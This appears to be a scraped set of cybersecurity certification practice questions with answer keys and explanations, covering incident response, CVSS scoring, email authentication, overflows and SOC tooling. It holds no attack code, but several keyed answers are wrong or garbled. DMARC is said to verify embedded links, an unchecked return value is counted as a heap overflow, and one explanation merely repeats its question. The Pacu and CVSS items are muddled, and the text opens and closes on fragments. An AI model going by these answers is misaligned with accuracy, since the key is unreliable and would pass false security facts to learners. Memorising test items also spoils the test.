B. PowerShell is a command-line interface that allows the user to manage and automate Windows-based operating systems, while a shell script is a set of commands written in a specific language that runs on a Unix-based operating system. PowerShell facilitates the management and automation of Windows-based operating systems by providing a command-line interface. Shell script is a set of commands written in a specific language that runs on a Unix-based operating system. Although PowerShell and shell script are both tools that automate tasks, they are not interchangeable and require different approaches to accomplish similar tasks.

In a recent cyber attack on a large multinational corporation, the attack is showing compromising sensitive customer information. Which of the following steps should the incident response team take after partially notifying management and assessing the potential impact of the compromise to ensure effective incident management? A. Contact regulatory bodies B. Prepare an incident declaration for approval by senior management C. Perform a full forensic investigation of the affected systems D. Contact the media

B. Prepare an incident declaration for approval by senior management Incident declaration and escalation are critical components of the incident response process. In a major cyber attack, it is important to promptly notify key stakeholders, and a formal incident declaration aids this process.

A SOC manager is building a business case to increase the use of automation. What are some of the primary benefits the manager could highlight? (Select the two best options.) A. Improving OSINT collection B. Preventing human error C. Reducing manual labor D. Increasing the use of plugins

B. Preventing human error C. Reducing manual labor Automating processes removes human interaction. This ensures that the system follows security processes consistently and without the human error that can result from operator fatigue. This is a significant benefit of automation. Reducing manual labor on a given task frees up analysts' time, allowing managers to redirect them toward other tasks.

What process evaluates the structure of hardware or software to reveal more about its unknown functions? A. Static analysis B. Reverse engineering C. Dynamic analysis D. Fuzzing

B. Reverse engineering Reverse engineering describes deconstructing software and/or hardware to determine how developers create them.

A tire sales and servicing company has implemented a security patch to fix a known vulnerability in their ordering system on their web server, but shortly after implementation, the company receives calls from customers that the ordering system is no longer functioning as intended. What is the best course of action? A. Validation B. Rollback C. Testing D. Implementation

B. Rollback Patch rollback reverts patches or configuration changes to their previous state in the event of unexpected issues or failures that arise after the system administrator has implemented the patch.

A large-scale business needs a system to control field devices with embedded PLCs on multiple sites spread over a large geographical area. What system should an information security program manager choose to best suit the coverage needed for this business? A. ICS B. SCADA C. DCS D. HMI

B. SCADA Supervisory control and data acquisition (SCADA) is an industrial control system that manages large-scale, multiple-site devices and equipment spread over geographically large areas from a host computer.

A company's security operations center (SOC) wants to minimize human engagement in its threat response process. Which of the following techniques can help achieve this goal? (Select the two best options.) A. Regular security awareness training for employees B. SOAR C. SIEM D. Improving team coordination and communication

B. SOAR C. SIEM Security orchestration, automation, and response (SOAR) is a solution that automates security operations and integrates security tools, allowing organizations to improve their ability to detect and respond to threats quickly and efficiently. Security information and event management (SIEM) is a security solution that aggregates and analyzes security data from various sources to identify potential security threats.

A security analyst working for a large financial institution is implementing Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) to improve email security for the company. The analyst's company has decided to implement SPF and DKIM to improve email security. Which of the following statements best describes SPF? A. SPF is a cryptographic protocol that ensures message confidentiality. B. SPF is an email authentication method that detects forged sender addresses in emails. C. SPF is a protocol used to encrypt email messages in transit. D. SPF is a protocol used to control access to network resources.

B. SPF is an email authentication method that detects forged sender addresses in emails. SPF is an email authentication method that detects forged sender addresses in emails. SPF verifies that the IP address of the sending mail server matches the IP address specified in the DNS record for the domain from which the email originated.

A cybersecurity analyst for a small company ensures the company's email security by configuring Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM). The analyst needs to explain to other employees how SPF and DKIM work together. Which of the following statements correctly explain the role of SPF and DKIM in securing email communications? (Select the two best options.) A. SPF verifies the message content while DKIM verifies the source IP address of incoming messages. B. SPF verifies the source IP address of incoming messages while DKIM verifies the message content. C. SPF and DKIM together prevent email spoofing and ensure message authenticity. D. SPF and DKIM work together to scan for malware.

B. SPF verifies the source IP address of incoming messages while DKIM verifies the message content. C. SPF and DKIM together prevent email spoofing and ensure message authenticity. SPF verifies the source IP address of incoming messages, while DKIM verifies the message content by attaching a digital signature to the email header. Together, they provide a strong defense against email forgery and ensure that email messages are legitimate and trustworthy. Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) are both email authentication protocols that work together to protect against email spoofing and ensure message authenticity.

EternalBlue, also known as CVE-2017-0148, has a CVSS score of 9.3. It is an exploit that allows remote attackers to execute arbitrary code via crafted packets and applies to many Windows operating systems prior to recent versions of Windows 10, an extremely popular and ubiquitous operating system. Which CVSS metric is likely the most influential factor in generating such a high CVSS score? A. Privacy B. Scope C. Availability D. Impact

B. Scope The scope is the biggest reason for the high Common Vulnerability Scoring System (CVSS) score due to its wide-reaching impact. The Windows operating system has over a 74% market share and is ubiquitous worldwide.

A cyber security analyst has performed a scan of multiple target endpoints on the network. The scan assesses the target endpoints configurations and cross-references them to an appointed profile. This scan ensures that devices and software maintain compliance with security requirements continuously. What type of scanning is the specialist performing? A. CIS benchmarks B. Security baseline C. Map/Discovery D. Internal

B. Security baseline The cyber security analyst is using security baseline scanning tools to evaluate endpoints against a baseline. It helps the analyst uncover less obvious problems and ensure devices and software maintain compliance with security requirements at all times.

An IT security analyst is verifying a coworker's email containing a link to a new report. The email seems legitimate, but the analyst notices that the link is obfuscated, suggesting it may be part of a social engineering attack designed to compromise the organization's security. What is the role of obfuscated links in social engineering attacks, and how do they impact IT security operations? (Select the three best options.) A. Obfuscated links are hyperlinks that have been intentionally broken to disrupt the flow of traffic and deny access to specific webpages. B. Social engineering attacks rely on human interaction to trick individuals into revealing sensitive information or performing actions that compromise network security. C. Obfuscated links are hyperlinks intentionally obscured to hide the true destination of the link, often used in phishing attacks. D. Social engineering attacks often use obfuscated l

B. Social engineering attacks rely on human interaction to trick individuals into revealing sensitive information or performing actions that compromise network security. C. Obfuscated links are hyperlinks intentionally obscured to hide the true destination of the link, often used in phishing attacks. D. Social engineering attacks often use obfuscated links to redirect users to malicious websites that install malware or steal login credentials. Social engineering attacks rely on the exploitation of human vulnerabilities, such as trust and curiosity, to gain unauthorized access to sensitive information or networks. Attackers often use obfuscated links in phishing attacks using social engineering to trick users into clicking on a link that leads to a fake website designed to steal personal information. Attackers often use obfuscated links in social engineering attacks to redirect users to malicious websites that can infect their devices with malware or steal login credentials.

A web application that requires user authentication has a security vulnerability that allows an attacker to send a specially crafted login request that contains more data than the application can handle. The application does not properly validate the input and attempts to write the excess data beyond the end of a fixed-size region of memory allocated at the application start time. As a result, the region of memory overflows, overwriting critical program data and allowing the attacker to execute arbitrary code on the server. What type of vulnerability does this situation describe? (Select the two best options.) A. Heap overflow B. Stack overflow C. Buffer overflow D. Integer overflow

B. Stack overflow C. Buffer overflow Stack overflow is a software vulnerability that occurs when a program tries to store more data in the stack, a fixed-size buffer than it can handle. Buffer overflow is an attack in which data goes past the boundary of the destination buffer and begins to corrupt adjacent memory. Buffer overflow is a general term referring to both heap and stack overflows.

A company has recently implemented a program to encourage ethical hackers to identify vulnerabilities in their systems. An independent cybersecurity researcher has discovered a critical vulnerability that could potentially compromise the company's user data. What is the responsible and ethical action for the researcher to take? A. Conduct adversary emulation to determine whether an APT could gain access B. Submit the findings to the company's bug bounty program C. Conduct penetration testing to see how much information is at risk from the vulnerability D. Conduct security control testing to determine the effectiveness of controls mitigating this vulnerability

B. Submit the findings to the company's bug bounty program Bug bounties identify elements of the environment that are in scope for testing and the rewards available for reporting issues. Using an independent (external) vulnerability researcher indicates that this is a bug bounty program.

A large retail chain has experienced a cyber attack that has resulted in the theft of customer credit card information. Which of the following factors should the retail chain consider when assessing the impact of the incident? (Select the three best options.) A. The physical damage to company assets B. The financial cost of the incident to the company C. The reputational damage to the company D. The legal and regulatory consequences of the incident

B. The financial cost of the incident to the company C. The reputational damage to the company D. The legal and regulatory consequences of the incident When assessing the impact of a cyber attack, it is important to consider the financial cost of the incident to the company, as this is the most common metric to quantify business impact. When assessing the impact of a cyber attack, it is important to consider the reputational damage to the company, as this can impact potential future revenue. When assessing the impact of a cyber attack, it is important to consider the legal and regulatory consequences of the incident, as this can produce fines and add to the financial cost of the incident.

A security analyst discovers a malicious process running on one of the servers exfiltrating data to an external IP address. The process has not been detected by the antivirus software. Which of the following is the most likely reason that the malicious process was able to exfiltrate data undetected by the antivirus software? A. The antivirus software was not up-to-date. B. The malicious process was disguised as a legitimate system file. C. The antivirus software was not configured to detect this type of threat. D. The antivirus software was disabled by the attacker.

B. The malicious process was disguised as a legitimate system file. The malicious process exfiltrated the data, and the software did not detect it because it appeared to be a legitimate system file. This is a technique commonly used by attackers to evade detection by security software.

An organization discovers a vulnerability in its web server's software by a threat actor and needs to create a timeline of the incident for regulators and internal stakeholders. Which of the following is the most important factor to consider when creating the timeline? A. The time of day the attack occurred B. The order of events during the attack C. The type of attack that was used D. The length of time the attack lasted

B. The order of events during the attack Creating a timeline that accurately reflects the order of events during the attack is critical to understanding the attack and identifying potential weaknesses in the organization's security posture.

What should organizations prioritize when selecting tools for vulnerability reporting? A. The cost of the tools B. The reporting needs of the organization C. The complexity of the tools D. The number of vulnerabilities identified

B. The reporting needs of the organization When selecting tools for vulnerability reporting, organizations should prioritize their organization's reporting needs over other factors, such as the tools' cost, the tools' complexity, or the number of identifying vulnerabilities.

The systems security officer reviewed a recent Common Vulnerability Scoring System (CVSS) report with a score of 9.4. The report for a newly deployed virtual appliance described issues with the physical and network attack vectors. The report also provided metrics such as Privileges Required (PR) with a value of 'N' and User Interaction (UI) with a value of 'N.' What can the security officer share with the appliance administrators to better secure the system immediately? A. Verify physical access logs to server racks B. Use only Active Directory (AD) groups and/or configure roles C. Setup data-at-rest encryption for the SQL database D. Setup a new local account with a complex password

B. Use only Active Directory (AD) groups and/or configure roles The PR metric with 'N' or none suggests a guest or anonymous user has access and can exploit more vulnerabilities. Setting up roles or permissions can prevent full access and most of the vulnerabilities.

An employee downloads a file attachment from a supposed coworker. The file, in reality, was a virus that required it to execute first to initiate the attack. Which exploitability metrics would score high when on a vulnerability assessment of the employee's workstation? A. Attack vectors B. User interaction C. Attack complexity D. Privileges required

B. User interaction Exploitability is the ease and likelihood of exploiting a vulnerability that involves an attack vector, attack complexity, privileges required, and user interaction. User interaction (UI) refers to exploiting the vulnerability depending on some local user action, such as executing a file attachment.

A security analyst is responsible for assessing vulnerabilities in the organization's network infrastructure. Which method would best complement their efforts to identify weaknesses effectively? A. Conducting regular security audits B. Utilizing vulnerability assessment tools C. Implementing continuous monitoring processes D. Performing penetration testing

B. Utilizing vulnerability assessment tools Vulnerability assessment tools scan systems and networks for potential weaknesses and vulnerabilities, helping the analyst identify areas that need improvement.

A penetration tester completed a credentialed vulnerability scan against a cloud-based software application used by their client company. The penetration tester discovered multiple vulnerabilities through the scan; however, none matched an available tool. What exploitable vulnerabilities would the penetration tester NOT discover through a credentialed vulnerability scan? A. Insecure API B. Zero-day C. Security misconfiguration D. External

B. Zero-day A zero-day represents an exploitable vulnerability with no available patch. A credentialed vulnerability scan would not discover a zero-day since a zero-day is not yet publicly known, and thus the penetration tester would not include it in the scan criteria.

Which of the following scenarios is an example of a heap overflow? (Select the two best options.) A. A program fails to sanitize user input, leading to a SQL injection attack. B. A program attempts to write data beyond the end of a fixed-size buffer. C. A program allocates memory to a dynamic buffer without proper bounds checking, leading to a buffer overflow. D. A program fails to check the return value of a function that could fail, leading to unpredictable behavior.

C. A program allocates memory to a dynamic buffer without proper bounds checking, leading to a buffer overflow. D. A program fails to check the return value of a function that could fail, leading to unpredictable behavior. Heap overflow is a software vulnerability where the system allows input to overwrite memory locations within the area of a process's memory allocation. The memory allocation stores dynamically sized variables. The buffer is dynamic; therefore, this is a heap overflow. Buffer overflow is an attack in which data goes past the boundary of the destination buffer and begins to corrupt adjacent memory. Buffer overflow refers to both heap and stack overflows. Failing to check the return value opens up for buffer overflow.

When using the Pacu tool to test the Amazon Web Services (AWS) account for open vulnerabilities, the external security team gained a session token and carried out other vulnerability tests on the AWS account. Although the security team could perform tests on the account for only an hour, what would be the most alarming conclusion about this test case? A. The web IAM dashboard shows findings. B. Domain POCs is publicly known. C. Access was granted without knowing passwords. D. Public entities are easily mapped for social engineering.

C. Access was granted without knowing passwords. The Pacu tool's iam_enum_roles module remotely discovers roles based on a dictionary attack. The session token, in this case, assumes that the accounts have dictionary passwords and are easy to threat actors.

While investigating malicious activity against their organization, an analyst establishes that a malicious actor is using anti-forensic techniques to evade detection. What type of actor is most likely responsible for this activity? A. Script kiddie B. MITRE ATT&CK C. Advanced persistent threat (APT) D. Command and control (C&C)

C. Advanced persistent threat (APT) APT describes the type of activity conducted by advanced cyber actors. This designation is most often associated with organized criminals and nation-states since it requires significant resources and coordination.

After a quick scan of a target URL, a security analyst is looking for detailed information in the dashboard about a few issues found in the "issue activity" panel of the Burp Suite tool's integrated web browser. Where can the security analyst find help to resolve those same issues? A. Event log panel B. Spider tab C. Advisory tab D. Alerts tab

C. Advisory tab The advisory tab is available after clicking on a finding in the "issue activity" panel. The advisory tab shows issue detail, background, and severity information.

A company has been targeted by a distributed denial-of-service (DDoS) attack, resulting in its website and online services being unavailable. Upon investigation, it is discovered that the attack originated from multiple sources and was directed at a specific set of targets. What is the most likely metric that the organization will use to measure the impact of this attack? A. Risk score B. Recurrence C. Affected hosts D. Mitigations required

C. Affected hosts A company has been targeted by a distributed denial-of-service (DDoS) attack, resulting in its website and online services being unavailable. Upon investigation, it is discovered that the attack originated from multiple sources and was directed at a specific set of targets. What is the most likely metric that the organization will use to measure the impact of this attack?

After a recent audit demonstrated system vulnerabilities, an organization tasked a cyber security specialist with performing a vulnerability scan across their system. Which method should the specialist use for collecting data from endpoints across the network using SSH protocol? A. Agent B. Passive C. Agentless D. Active

C. Agentless Agentless scans can be the simplest to implement, as the scanner can collect information from endpoints using protocols such as secure shell (SSH), Windows Management Instrumentation (WMI), or Simple Network Management Protocol (SNMP) without the use of dedicated software.

The security team at a large organization is analyzing a recent cyberattack that targeted their network infrastructure. They must focus on the attack stages and the relationships between the adversary, infrastructure, and capabilities to understand the attack and plan for future security measures. What should the security team prioritize to address the current situation effectively and improve their security operations? A. Conducting a thorough vulnerability assessment of their systems B. Implementing strict access control policies and procedures C. Analyzing the attack using the Diamond Model of Intrusion Analysis and the cyber kill chain D. Deploying advanced intrusion detection systems

C. Analyzing the attack using the Diamond Model of Intrusion Analysis and the cyber kill chain By using the Diamond Model of Intrusion Analysis and the cyber kill chain, the security team can make informed decisions and improve their security operations.

An unauthenticated attacker exploited a company's web portal that contains customer information, where customers can view their account profile, such as their name, email address, and account balance. Each customer has a unique ID used to retrieve their information from the database. However, the attacker changed the customer ID parameter in the URL to access customers' information. What kind of web application vulnerability did the attacker exploit? A. Security misconfiguration B. Software and data integrity failures C. Broken access control D. Injection

C. Broken access control Broken access control is a common vulnerability in web applications that can allow attackers to access sensitive data or perform unauthorized actions, such as manipulating the URL.

A company realizes that an attacker has persistent access to several internal servers. What team is best prepared to react to this? A. Threat hunters B. Hacktivists C. CSIRT D. General council

C. CSIRT Computer security incident response team (CSIRT) is a group of security professionals with a wide variety of specialties who respond to security incidents quickly and effectively.

A network administrator assesses multiple attack vectors revealed from a recent vulnerability scan of the organization's cloud-based software. Which of these CVSS scores presents the greatest threat to Confidentiality? A. CVSS:2.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H B. CVSS:7.9/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:L C. CVSS:3.2/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N D. CVSS:9.3/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H

C. CVSS:3.2/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N CVSS: 3.2 ... C:H indicates a Common Vulnerability Scoring System (CVSS) score of 3.2 and a Confidentiality impact of High (C:H). For it to present the greatest threat to Confidentiality, it must also reference a high impact value, noted as C:H.

How are cloud system and network architecture concepts essential for securing hybrid and on-premises systems? A. Cloud system and network architecture concepts are optional and not necessary for securing hybrid and on-premises systems. B. Cloud system and network architecture concepts make securing hybrid and on-premises systems more complex and difficult. C. Cloud system and network architecture concepts enable organizations to consolidate and streamline their security operations, regardless of where their data resides. D. Cloud system and network architecture concepts only apply to cloud-based systems and do not provide any benefits for on-premises systems.

C. Cloud system and network architecture concepts enable organizations to consolidate and streamline their security operations, regardless of where their data resides. Cloud system and network architecture concepts provide a unified security framework that applies across hybrid and on-premises systems, enabling organizations to streamline their security operations.

While assessing the effectiveness of their security operations center (SOC), an organization realizes they are lacking effective team coordination. What are some things they could implement to improve coordination? (Select the two best options.) A. APIs B. A SOAR C. Communication skills training D. Information sharing SOPs

C. Communication skills training D. Information sharing SOPs Members with a variety of specialties make up a SOC. For the team to be effective, each of the members must be an effective communicator. SOPs for sharing information among team members ensure effective communication procedures are in place. These are especially important during crises.

A company has hired a consulting firm to conduct penetration testing on their network. As the PenTest team begins testing, they notice significant network traffic to and from a private IP address they do not recognize. What should be their next step? A. Conduct edge discovery to identify other potential targets and vulnerabilities B. Conduct host discovery to identify other potential targets and vulnerabilities C. Conduct a passive discovery to identify potential vulnerabilities D. Conduct network discovery to identify other potential targets and vulnerabilities

C. Conduct a passive discovery to identify potential vulnerabilities Passive discovery is a practical next step for the IT team. Passive discovery uses indirect methods to identify systems, services, and protocols. The team can conduct a passive discovery to learn more while maintaining network functionality.

After an incident, the incident response team wants to determine the underlying reason why the incident was able to happen. Which of the following steps should the team take to achieve this? A. Describe the impact on customers and partners B. Conduct a timeline analysis C. Conduct a root cause analysis D. Notify customers

C. Conduct a root cause analysis Conducting a root cause analysis can help the incident response team identify the underlying cause of the incident and develop measures to prevent future incidents.

A software development company is conducting training sessions for its employees to improve their security awareness. The company aims to ensure that the training is effective and helps prevent future security incidents. How can the company incorporate lessons learned from past security incidents to contribute to the training program's success? A. Demonstrate the consequences of security breaches B. Enhance the understanding of security policies C. Conduct tabletop exercises based on scenarios of past incidents D. Identify gaps in security awareness

C. Conduct tabletop exercises based on scenarios of past incidents By simulating the incidents in a controlled environment, like a tabletop exercise, employees can practice their incident response skills and test the effectiveness of the company's security policies and procedures.

A security analyst at an insurance company needs to evaluate the effectiveness of the organization's incident response activities. What should the analyst do to best assess the performance of the incident response team? A. Reviewing playbooks B. Assessing security tools C. Conducting post-incident reviews D. Conducting penetration tests

C. Conducting post-incident reviews Post-incident reviews involve analyzing the incident response process, identifying areas of improvement, and implementing changes to enhance the team's effectiveness in handling future incidents. This comprehensively evaluates the team's performance and ability to respond to incidents.

A security analyst is responsible for ensuring a company's serverless infrastructure is secure. Recently, the company had a data breach due to a misconfigured serverless function. Which security measure should the analyst implement to prevent future data breaches on the company's serverless infrastructure? A. Implement network segmentation B. Deploy a firewall C. Configure access control D. Use intrusion detection system (IDS) to monitor functions

C. Configure access control Configuring access control on serverless functions is essential to prevent unauthorized access to the company's data.

A financial organization is exploring special considerations in vulnerability scanning to enhance its security posture. After discovering a security breach, the organization focuses on remediation and maintaining the chain of custody for legal purposes. Which actions would be most appropriate for the organization to ensure effective remediation while preserving the chain of custody? A. Re-image affected systems B. Establish a security operations center (SOC) C. Create a detailed incident response plan D. Use a cloud access security broker (CASB)

C. Create a detailed incident response plan A comprehensive incident response plan outlines remediation efforts and preserves the chain of custody for legal purposes. This plan ensures that the organization handles incidents effectively while maintaining the integrity of digital evidence.

A security operations center (SOC) manager identifies a considerable amount of time is being wasted by switching between different consoles. What is one way to update operations to mitigate this issue? A. Start threat hunting B. Engage in risk management C. Create a single pane of glass D. Improve team coordination

C. Create a single pane of glass A single pane of glass is a unified view of the security tools and other related services defending a network. This interface allows network defenders to view and control everything in one place.

A cybersecurity analyst for a large financial services company reviews the company's email security controls and is concerned about the risk of phishing attacks. The analyst decides to implement Domain-based Message Authentication, Reporting, and Conformance (DMARC) to better protect the company's email domain. Which of the following best describes the correlation between embedded links and DMARC? A. DMARC protects against phishing attacks that use embedded links by analyzing email headers. B. DMARC prevents embedded links from being included in emails altogether. C. DMARC verifies the authenticity of embedded links by checking the sender's domain against the DMARC record. D. DMARC only applies to email messages that contain embedded links from untrusted senders

C. DMARC verifies the authenticity of embedded links by checking the sender's domain against the DMARC record. Domain-based Message Authentication, Reporting, and Conformance (DMARC) is an email authentication protocol designed to detect and prevent email spoofing, phishing, and other types of email-based attacks by verifying the authenticity of embedded links and checking the sender's domain against the DMARC record. If the sender's domain fails DMARC authentication, the system can quarantine or reject the email before it reaches the recipient's inbox.

A security operations center (SOC) manager wants to leverage orchestration to improve threat intelligence consumption across the organization. What are some ways in which orchestration can improve the use of threat intelligence consumption? A. APIs B. Webhooks C. Data enrichment D. Plugins

C. Data enrichment Enriching data involves combining feeds from various sources in a single location to provide a better understanding of the threat landscape. Enriched data gives a more complete picture of adversary tools, tactics, and procedures.

A security analyst at a software development company is responsible for identifying potential threats to the organization's network. The analyst recently discovered a misconfigured server hosting one of the company's web applications. Given the potential risk, what should be the analyst's primary focus to ensure network security and system architecture when addressing this situation? A. Implementing security controls based on industry best practices B. Analyzing network traffic for signs of unauthorized access C. Determining the stage of a possible attack and assessing web application vulnerabilities D. Investigating the organization's physical security measures

C. Determining the stage of a possible attack and assessing web application vulnerabilities The analyst should prioritize understanding if an attacker has exploited the misconfigured server, determining the possible attack stage, and evaluating web application vulnerabilities. This focus aligns with the objectives of the cyber kill chain model and the Open Web Application Security Project (OWASP) Testing Guide.

A security analyst is working on improving the organization's cybersecurity posture and needs to analyze a recent attack on their network. The analyst must determine the relationships between the adversary, infrastructure, and attack capabilities while also understanding the attacker's techniques, tactics, and procedures. What should the analyst use to comprehensively understand the attack and enhance the organization's vulnerability scanning methods? A. NIST Cybersecurity Framework and OWASP Top Ten B. Cyber kill chain and CIS Critical Security Controls C. Diamond Model of Intrusion Analysis and MITRE ATT&CK Framework D. ISO/IEC 27001 Information Security Management System

C. Diamond Model of Intrusion Analysis and MITRE ATT&CK Framework The Diamond Model of Intrusion Analysis enables the analyst to understand the relationships between the adversary, infrastructure, and attack capabilities. Meanwhile, the MITRE ATT&CK Framework provides insight into the attacker's techniques, tactics, and procedures.

A government agency had a breach at one of its locations that resulted in stolen hard drives. The virtual servers on the stolen hard drives had data for only one virtual appliance replicating to the secondary virtual appliance remotely. A security investigation report showed that the agency did not set up virtual appliances with data-at-rest security features. What must the system administrators do to ensure another breach does not jeopardize the government? A. Setup backup targets B. Configure high availability C. Encrypt the virtual server D. Setup for disaster recovery

C. Encrypt the virtual server Encryption provides data-at-rest security for virtual and physical servers at the drive level. For example, if a hard drive gets stolen, the data is not recoverable without the decryption keys.

A cybersecurity team is planning to implement automation in their security operations center. Which aspect should they focus on to ensure they can detect and respond to threats quickly? A. Consider the frequency of tasks B. Identify high-risk areas C. Evaluate time-to-detection D. Evaluate the benefits of automation

C. Evaluate time-to-detection Evaluating time-to-detection is how security operations centers (SOC) teams evaluate how long it takes them to detect and respond to security incidents.

A large corporation experienced a data breach in which a perpetrator stole sensitive customer information. During the incident response process, the team discovered potential suspects. Which is the most crucial factor in determining the perpetrator of the breach? A. Stakeholders impacted B. Incident declaration C. Evidence D. Timeline of breach

C. Evidence In a cybersecurity incident response, the most crucial factor in determining the perpetrator of a breach is the evidence. Evidence such as network logs, device logs, and forensic analysis can provide proof of the perpetrator's identity.

An IPS permits a connection between a Domain Controller and a user device in the domain on port 445. A domain-enabled account then authenticates to the user device, accesses sensitive data, and transmits it over a Wide Area Network (WAN). What is the type of error in this situation? A. False positive B. True positive C. False negative D. True negative

C. False negative The intrusion prevention system (IPS) causes a false negative error when a scan fails to detect a vulnerability when there is one. Identifying and managing false negatives is important, reducing the probability of intrusion into the network.

A growing e-commerce company is concerned about potential cybersecurity threats and has decided to invest in threat-hunting. The company tasks its security team with proactively identifying and mitigating threats before they escalate. Which threat-hunting techniques would be most effective for the security team to prioritize their efforts? A. Analyze historical security incidents B. Conduct vulnerability assessments C. Focus on high-impact and broad-scope threats D. Perform regular log analysis

C. Focus on high-impact and broad-scope threats By prioritizing high-impact and broad-scope threats, the security team can concentrate on addressing the most significant risks that could potentially affect a large portion of the organization's assets or operations.

A security analyst reviews the logs of a web server for suspicious activity and notices that someone sent a message to the server with a header that had unusual metadata. Which of the following statements best explains the difference between hashing and headers in security operations? A. Hashing generates unique digital representations of data, while headers encrypt the data. B. Hashing and headers both add metadata to data packets, but hashing only adds metadata to the header, while headers add metadata to the entire packet. C. Hashing generates unique digital representations of data, while headers add metadata to a message or data packet. D. Hashing and headers both identify the location of a message or data packet in a network.

C. Hashing generates unique digital representations of data, while headers add metadata to a message or data packet. Hashing, a process used in security operations, creates a unique digital representation of data. Headers contain information such as the source and destination of the message, the type of data someone is sending, and other information relevant to the transmission of the data.

A hacker launches an attack that requires specialized knowledge and tools, including significant time and resources. What is the Attack Complexity score for this attack as part of the CVSS framework? A. Low B. Critical C. High D. Medium

C. High Attack complexity refers to the difficulty of the attack techniques used by a threat actor. Therefore, a high score is appropriate since the attack requires specialized knowledge, resources, and the time to succeed.

A security team has conducted a vulnerability scan on their organization's systems and generated a detailed list of affected hosts. The team needs to share the report with the IT department, but they want to make sure it is easy to view in a browser. Which format should the security team choose for the vulnerability report to ensure it is visually appealing and the IT department can view it in a browser-based dashboard? A. Comma Separated Values (CSV) B. EXtensible Markup Language (XML) C. HyperText Markup Language (HTML) D. Plain text

C. HyperText Markup Language (HTML) HyperText Markup Language (HTML) based reports are more visually appealing than plain text reports and can be in a browser due to improved organization and viewing properties.

A company's online ordering system uses a username and password to authenticate users. However, the password requirements are weak, and the usernames are all publicly available e-mail addresses of customer businesses. As a result, an attacker can easily guess or brute-force the passwords and gain access to sensitive information. What type of vulnerability does this situation describe? A. Broken access control B. Software and data integrity failures C. Identification and authentication failures D. Cryptographic failures

C. Identification and authentication failures Identification and authentication failures are security vulnerabilities where systems or applications fail to verify user identity, allowing unauthorized access properly. This failure can result from weak or easily guessable passwords, lack of multifactor authentication, or insufficient verification of credentials.

A company that has experienced a breach needs to determine the customers whose personal information was exposed and the employees involved in the breach. The company must also communicate with the regulators and law enforcement agencies investigating the breach. The company also needs to provide information about the steps that it is taking to mitigate the damage and prevent future breaches from satisfying regulators. What does this process describe? A. Identifying and reporting an incident B. Establishing who, what, when, where, and why the incident occurred C. Identifying and communicating with all stakeholders D. Creating recommendations on reducing vulnerability

C. Identifying and communicating with all stakeholders Stakeholder identification and communication are important parts of crisis management. In a data breach, it is important to identify and communicate with all stakeholders affected, such as customers, employees, investors, and regulators.

A security analyst at a large organization is responsible for identifying active threats to the company's network. To effectively monitor and analyze these threats, the analyst decides to use the MITRE ATT&CK framework in conjunction with the cyber kill chain model. The analyst receives an alert about a potential spear-phishing attack targeting employees. When using these frameworks to assess the situation, what should be the analyst's primary focus? A. Analyzing the attacker's post-exploitation activities B. Implementing new security controls based on the MITRE ATT&CK framework C. Identifying the stage of the attack in the cyber kill chain D. Reviewing the company's incident response plan

C. Identifying the stage of the attack in the cyber kill chain The primary focus of the analyst should be to identify the attack stage in the cyber kill chain model. Understanding the stage of the attack helps the analyst determine the scope and potential impact of the threat and guides the response actions accordingly.

A financial services company is updating its incident response plan to better address security incidents. As part of this update, the cybersecurity team wants to emphasize the importance of root cause analysis when investigating incidents. How can incorporating root cause analysis into the incident response plan help the organization better understand the technology involved in security operations? A. Revealing attacker behavior and techniques B. Adhering to regulatory requirements C. Identifying underlying vulnerabilities D. Fostering cooperation among cybersecurity professionals

C. Identifying underlying vulnerabilities Root cause analysis helps the organization better understand the technology involved in security operations by identifying underlying vulnerabilities and weaknesses in their systems and infrastructure.

A security analyst must improve the organization's ability to detect and respond to threats targeting its systems. The analyst looks into various methodologies and frameworks to better understand and identify host indicators that could suggest a compromise. What should be the analyst's main focus to enhance the detection of host-based threats? A. Deploy web application firewalls B. Develop an incident response plan C. Implement host-based intrusion detection systems (HIDS) and analyze system logs D. Implement a data loss prevention (DLP) solution

C. Implement host-based intrusion detection systems (HIDS) and analyze system logs A host-based intrusion detection system (HIDS) and system log analysis are crucial for uncovering host indicators of compromise, in line with the Open Source Security Testing Methodology Manual (OSSTMM) and Open Web Application Security Project (OWASP) Testing Guide methodologies.

A cloud service provider (CSP) conducted a vulnerability assessment on their infrastructure and identified several security issues. The CSP is now looking for effective compensating controls to address these vulnerabilities while minimizing the impact on operations. Which compensating controls would be most suitable for isolating vulnerable systems in the cloud environment? A. Deploy a virtual private cloud (VPC) B. Use security groups to restrict access C. Implement network segmentation D. Establish a screened subnet

C. Implement network segmentation By dividing the network into smaller segments, it restricts unauthorized access, limits the potential impact of an attack, and provides additional protection for sensitive data and critical systems.

A security analyst must improve the organization's detection and response capabilities to potential cyber threats. The analyst is researching different methodologies and frameworks to help them identify network indicators that may signal an ongoing attack. What should the analyst prioritize to enhance the organization's ability to detect and respond to potential threats? A. Perform regular software patching B. Conduct a physical security audit C. Implement network traffic analysis and use threat intelligence D. Establish a centralized logging system

C. Implement network traffic analysis and use threat intelligence Aligning network traffic analysis and threat intelligence with frameworks like Open Source Security Testing Methodology Manual (OSSTMM) and the cyber kill chain can help the analyst better understand attack progression and identify network indicators associated with potential threats.

A company has just experienced a ransomware attack resulting from a remote attacker using employee credentials after compromising them by technical means. The incident response team needs to provide recommendations in the incident report for improving the organization's cybersecurity posture. Which of the following recommendations would be the most effective? A. Upgrading the firewall software B. Running regular vulnerability scans C. Implementing multi-factor authentication D. Conducting security awareness training for employees

C. Implementing multi-factor authentication Multi-factor authentication is a critical security measure that can prevent unauthorized access to systems and data. This recommendation can help the organization strengthen its security posture and prevent future attacks.

A large retail company has identified a cyber attack on its payment processing system. What is their first step in the incident response process? A. Timeline of breach B. Evidence C. Incident declaration D. Stakeholders impacted

C. Incident declaration Incident declaration and escalation involves identifying and reporting an incident to appropriate stakeholders and then escalating it to the next level of response if necessary. It is the first step of the incident response process.

What are the security benefits of using software-defined networking (SDN) and virtualization in a network environment? (Select the two best options.) A. Enhanced network security through hardware-based firewalls B. Improved network performance through optimized routing C. Increased network agility for faster deployment of security controls D. Simplified network segmentation and isolation for easier threat containment

